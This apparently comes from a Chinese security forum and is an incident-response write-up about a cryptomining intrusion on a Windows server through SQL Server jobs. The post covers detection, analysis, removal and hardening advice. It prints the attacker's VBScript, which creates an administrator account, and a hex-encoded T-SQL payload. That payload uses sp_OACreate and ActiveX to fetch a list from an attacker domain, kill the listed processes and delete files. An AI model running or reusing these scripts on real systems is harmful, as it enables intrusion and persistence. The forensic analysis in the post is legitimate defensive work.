问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
【实战】记一次挖矿应急响应
一次基于Mssql作业任务的应急响应
### 前言 在一个阳光明媚的下午和群里的兄弟在吹牛,然后甲方爸爸突然发了一张截图~ ![image.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-49d0f60cf1aefad5ed733a2ab9feab7a1f09b85e.png) ### 分析与处置 1.立马通知现场的同事先对服务器进行断网 2.此告警为防火墙与EDR联动之后由防火墙推送过来的,查看防火墙上的告警,发现受害主机在每天的0点、8点、14点、16点左右均会访问恶意域名down.b591.com和down.1226bye.pw,初步判断可能是入侵者配置的定时任务触发告警 ![image.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-6beae07f9e3767f16375db25886cf9509f0e3ddb.png) 3.上机排查系统计划任务,计划任务中存在一个2015年10月16日创建的名称为456456的定时任务,计划脚本内容如下: Set o=CreateObject("Shell.Users") Set z=o.create("nanshou") z.changePassword "nanshoul","" z.setting("AccountType")=3 ![image.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-41ea750beafd59dd88a4768fe954ae8f91b24304.png) 该脚本为每一分钟添加一个账号密码为nanshou/nanshou1的系统用户,先删除对应的脚本nanshou.vbs和定时任务,再将nanshou用户删除 ![image.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-5d70c4cbb50dd3cf362eee0f832e51b03e7ffc12.png) 4.目前只找到一个恶意的计划任务,确认是被入侵成功,但还未找到已挖矿相关的痕迹,继续排查安全设备与服务器,EDR上发现访问恶意域名的动作由sqlserver.exe发起,利用沙箱对其进行分析,并未发现其有访问恶意域名的动作和其他恶意行为 ![image.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-532d1ddcd7e5fed50d6fc62985c3a731d55596b0.png) ![image-20221025153331124.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-bb2cd90ac9025c507e1af9adcf4d9ff91713048f.png) 5.根据EDR上sqlserver.exe的调用行为,与该恶意域名的威胁分析,初步判断与sqlserver数据库有关 ![image.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-633e42fed29a21930db6e7fa211e2246cd37b0da.png) 6.登录受害主机sqlserver数据库,查看其计划作业任务,发现存在多个定时计划作业任务 ![image.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-1ff18b3e82ec4c3208fc1e4d7bd8d421d1eae473.png) 7.逐个核查计划作业任务, ftpbacks.exe 该作业任务为每天2点左右通过ftp服务访问恶意域名:down.1226bye.pw,下载恶意文件,并保存到C:/windows/system目录下,检查C:/windows/system目录,未发现有下载成功的恶意脚本存在 ![image.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-c4b3e02aadfaad3589dcaf1fb6ecfb083d974b74.png) 根据作业步骤显示,该作业任务的脚本位置在C:/windows/system目录下,作业内容如下图所示,已删除该计划作业任务和恶意脚本 ![image.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-cda577cb9f5cb3809c49359e56fcbce280aa03f1.png) ![image.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-eecd361df310ce3f777e3e5d28c80f9ba0ea071d.png) ![image.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-94957aceb6885f8c63487256b5281a28075d22b3.png) 8.继续分析作业任务dbdotas、dbdotas2和task.exe,发现其作业内容均为同一段HEX加密的编码 `declare @a varchar(8000);set @a=0x4445434C41524520406A733120696E743B455845432073705F4F414372656174652027536372697074436F6E74726F6C272C406A7331204F55543B455845432073705F4F4153657450726F706572747920406A73312C20274C616E6775616765272C20274A617661536372697074312E31273B455845432073705F4F414D6574686F6420406A73312C20274576616C272C204E554C4C2C202775726C203D2022687474703A2F2F646F776E2E623539312E636F6D3A383838382F6B696C6C2E68746D6C223B2068747470203D206E657720416374697665584F626A65637428224D73786D6C322E584D4C4854545022293B2066736F203D206E657720416374697665584F626A6563742822536372697074696E672E46696C6573797374656D4F626A65637422293B20777368203D206E657720416374697665584F626A6563742822575363726970742E5368656C6C22293B20687474702E6F70656E2822474554222C2075726C2C2066616C7365293B20687474702E73656E6428293B20737472203D20687474702E726573706F6E7365546578743B20617272203D207374722E73706C697428225C725C6E22293B20666F72202869203D20303B2069203C206172722E6C656E6774683B20692B2B29207B2074203D206172725B695D2E73706C697428222022293B2070726F63203D20745B305D3B2070617468203D20745B315D3B2064656C65203D20745B325D3B207773682E52756E28227461736B6B696C6C202F66202F696D2022202B2070726F632C20302C2074727565293B206966202864656C65203D3D203029207B20747279207B2066736F2E44656C65746546696C6528706174682C2074727565293B207D20636174636820286529207B7D207D207D27;exec(@a);` 经过HEX转码后发现这是一个用 JavaScript 和 VBScript 混合编写的脚本,使用 ActiveX 对象执行恶意操作。该脚本创建一个 ActiveX 对象“ScriptControl”并将其语言属性设置为 JavaScript 1.1。然后它使用“Eval”方法运行一串包含 JavaScript 和 VBScript 代码的代码。该代码执行以下操作: 1. 创建了几个 ActiveX 对象,包括用于发送 HTTP 请求的“Msxml2.XMLHTTP”、用于操作文件的“Scripting.FileSystemObject”和用于执行 shell 命令的“WScript.Shell”。 2. 使用“Msxml2.XMLHTTP”对象的“打开”和“发送”方法向指定的 URL 发送 GET 请求,请求down.b591.com:8888/kill.html尝试下载文件,并将响应文本保存到变量中。 3. 将响应文本拆分为一个数组并循环遍历每个元素。对于每个元素,它再次将其分成两部分:进程名称和文件路径。 4. 使用“WScript.Shell”对象的“Run”方法来执行 shell 命令“taskkill /f /im”,后跟进程名称。这将强制终止指定的进程。 5. 如果元素的第二部分为 0,则使用“Scripting.FileSystemObject”对象的“DeleteFile”方法删除指定的文件路径。 ![image-20221027181104976.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-10bcc73dcd9d9d4fecae16b4b3c8db754b6ee8fb.png) 9.继续分析计划作业任务dbdotas3,发现其也为恶意作业任务,解码发现其存在访问恶意IOC的行为,立即对其进行删除处理 ![image-20221027181506250.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-410c06ac00832a898e0cb6cfaf7926384334245e.png) ![image.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-36e1b3908caee399dcf4a0776123829ad6bd7dae.png) 10.分析pdoors.exe作业任务,其为运行ftpbacks.exe作业任务下载的恶意脚本myusago.dvr,已删除该作业计划 ![image.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-8a192ea1ceda5b2870640b52c6855f8d106565cb.png) 11.分析pdoors.exe作业任务,其为运行ftpbacks.exe作业任务下载的恶意脚本backs.bat,已删除该作业计划 ![image.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-a0065e9b9a30d783020461a7e272359b43604719.png) ### 入侵路径还原 由于入侵时间久远(初步判断为2015年10月14日),数据库日志和系统日志缺失,且服务器审核策略未完全配置,无法准确溯源 ![image.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-667b8b162cd263476b22342319b3c3e1b519ec8d.png) 根据威胁情报大概判断入侵路径为利用暴露在外网的SQL Server数据库弱密码爆破方式入侵该windows服务器(该服务器已在几年前禁止与外网通信),最后建立sqlserver计划作业任务来进行下一步的挖矿动作。 ### 加固建议 1\. 建议数据库和RDP等避免使用弱密码,避免多个系统使用同一个密码,登录口令需要满足等保要求的长度和复杂度,并且定期更换口令。 2\. 关闭数据库账号登录方式,以 windows 身份验证方式登录数据库,并在 windows 策略里设置密码强度。 3\. 建议加强安全管理,建立网络安全应急处置机制,完善系统日志审核策略、存储容量及存储方式,配合安全设备做好监测措施,及时发现攻击风险,及时处理。
发表于 2023-02-10 14:15:37
阅读 ( 7801 )
分类:
应急响应
5 推荐
收藏
0 条评论
请先
登录
后评论
J1ng
2 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!